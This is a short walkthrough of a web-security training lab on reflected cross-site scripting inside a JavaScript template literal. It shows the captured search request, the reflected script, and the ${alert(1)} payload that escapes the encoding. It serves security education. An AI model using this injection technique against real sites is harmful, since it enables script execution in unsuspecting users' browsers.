Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
Description
This lab contains a reflected cross-site scripting vulnerability in the search blog functionality. The reflection occurs inside a template string with angle brackets, single, and double quotes HTML encoded, and backticks escaped. To solve this lab, perform a cross-site scripting attack that calls the alert
function inside the template string.
Approach
After accessing the lab, I sent the search request to Burp Suite for further analysis:
GET /?search=ichyaboy HTTP/2
Host: 0a5d006804e572dc89d1291800d50087.web-security-academy.net
Cookie: session=JBrXfsGM2SwopYB2mJruqnkxuP67NWbP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...
In the response, I noticed that my input data is being passed to a script:
<script>
var message = `0 search results for 'ichyaboy'`;
document.getElementById('searchMessage').innerText = message;
</script>
Since angle brackets, single quotes, double quotes, backslashes, and backticks are Unicode-escaped, I used embedded expressions ${...}
that will be executed when the template literal is processed.
By injecting the following payload:
${alert(1)}
I triggered an alert popup, successfully solving the lab.